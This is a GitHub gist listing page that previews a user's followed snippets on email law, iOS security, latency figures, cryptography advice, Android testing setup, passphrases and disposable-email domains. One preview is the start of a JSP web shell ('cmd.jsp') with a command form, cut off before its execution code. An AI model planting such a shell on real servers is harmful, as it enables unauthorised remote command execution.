Skip to content

Instantly share code, notes, and snippets.

View JamesMilazzo's full-sized avatar

James Milazzo JamesMilazzo

6 followers · 11 following
  • Seattle, WA
View GitHub Profile
@seldo
seldo / can-spam.md
Last active May 2, 2023 19:52
CAN-SPAM

Hi! I notice your email doesn't contain instructions on how to unsubscribe, which is illegal:

https://www.ftc.gov/tips-advice/business-center/guidance/can-spam-act-compliance-guide-business

Despite its name, the CAN-SPAM Act doesn’t apply just to bulk email. It covers all commercial messages, which the law defines as “any electronic mail message the primary purpose of which is the commercial advertisement or promotion of a commercial product or service,” including email that promotes content on commercial websites. The law makes no exception for business-to-business email. That means all email – for example, a message to former customers announcing a new product line – must comply with the law.

Each separate email in violation of the CAN-SPAM Act is subject to penalties of up to $46,517, so non-compliance can be costly. But following the law isn’t complicated. Here’s a rundown of CAN-SPAM’s main requirements:

  1. Don’t use false or misleading header information.
  2. Don’t use deceptive subject lines.
@lindeskar
lindeskar / safari-history.sh
Last active February 16, 2024 11:39
macOS 10.13 Safari browser history with timestamp
sqlite3 $HOME/Library/Safari/History.db "select datetime(visit_time + 978307200, 'unixepoch', 'localtime') as date, title from history_visits order by visit_time asc"
@computerality
computerality / gist:3e0bc104cd216bf0f03f8d3aa8fbf081
Last active December 12, 2020 14:30
iOS Security Guide changes for iOS 10 from March 2017
These are additions or notable revisions in the iOS Security Guide
Document Revision History Summary Updated for iOS 10
• System Security
• Data protection classes
• Security Certifications and programs
• HomeKit, ReplayKit, SiriKit
• Apple Watch
• Wi-Fi,VPN
• Single Sign-on
• Apple Pay, Paying with Apple Pay on the web
@GLMeece
GLMeece / latency_numbers.md
Last active May 22, 2024 15:57
Latency Numbers Every Programmer Should Know - MarkDown Fork

Latency Comparison Numbers

Note: "Forked" from Latency Numbers Every Programmer Should Know

Event Nanoseconds Microseconds Milliseconds Comparison
L1 cache reference 0.5 - - -
Branch mispredict 5.0 - - -
L2 cache reference 7.0 - - 14x L1 cache
Mutex lock/unlock 25.0 - - -
@atoponce
atoponce / gist:07d8d4c833873be2f68c34f9afc5a78a
Last active June 1, 2024 04:56 — forked from tqbf/gist:be58d2d39690c3b366ad
Cryptographic Best Practices

Cryptographic Best Practices

Putting cryptographic primitives together is a lot like putting a jigsaw puzzle together, where all the pieces are cut exactly the same way, but there is only one correct solution. Thankfully, there are some projects out there that are working hard to make sure developers are getting it right.

The following advice comes from years of research from leading security researchers, developers, and cryptographers. This Gist was [forked from Thomas Ptacek's Gist][1] to be more readable. Additions have been added from

@MrVaughan
MrVaughan / Tool Setup for Mobile Android Application Assessment.md
Last active July 10, 2018 13:49

##About I do android application assessments often. This is the list of tools and setup I use to perform my testing. It's a reminder for me for when I have to wipe/reload my computer.

###Enable Developer Mode on Test Device

  1. Go to the settings menu, and select "About phone."
  2. Scroll down to "Build number."
  3. Tap it seven (7) times.

###OpenJDK sudo apt-get install openjdk-7-jdk

@jaceklaskowski
jaceklaskowski / deployment-tool-ansible-puppet-chef-salt.md
Last active January 3, 2024 22:12
Choosing a deployment tool - ansible vs puppet vs chef vs salt

Requirements

  • no upfront installation/agents on remote/slave machines - ssh should be enough
  • application components should use third-party software, e.g. HDFS, Spark's cluster, deployed separately
  • configuration templating
  • environment requires/asserts, i.e. we need a JVM in a given version before doing deployment
  • deployment process run from Jenkins

Solution

@craSH
craSH / diceware.py
Last active April 28, 2017 17:44
Select easy to use passphrases based on the diceware list; but not their selection methodology [lazy]
#!/usr/bin/env python
"""
Select easy to use passphrases based on the diceware list; but not their selection methodology [lazy].
Place the diceware and beale wordlists (GPG signed is fine) in /usr/share/dict before use.
* Diceware list: http://world.std.com/~reinhold/diceware.wordlist.asc
* Alternative Beale list: http://world.std.com/~reinhold/beale.wordlist.asc
* EFF List (Large): https://www.eff.org/files/2016/07/18/eff_large_wordlist.txt
* EFF List (Small): https://www.eff.org/files/2016/09/08/eff_short_wordlist_1.txt
@ErosLever
ErosLever / cmd.jsp
Created March 18, 2015 09:13
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
<form method="GET" action="">
<input type="text" name="cmd" />
<input type="submit" value="Exec!" />
</form> <%!
public String esc(String str){
StringBuffer sb = new StringBuffer();
for(char c : str.toCharArray())
if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' )
sb.append( c );
else
@nocturnalgeek
nocturnalgeek / MailinatorAliases
Last active May 28, 2024 06:39
A list of alternate domains that point to @mailinator.com
@binkmail.com
@bobmail.info
@chammy.info
@devnullmail.com
@letthemeatspam.com
@mailinater.com
@mailinator.net
@mailinator2.com
@notmailinator.com
@reallymymail.com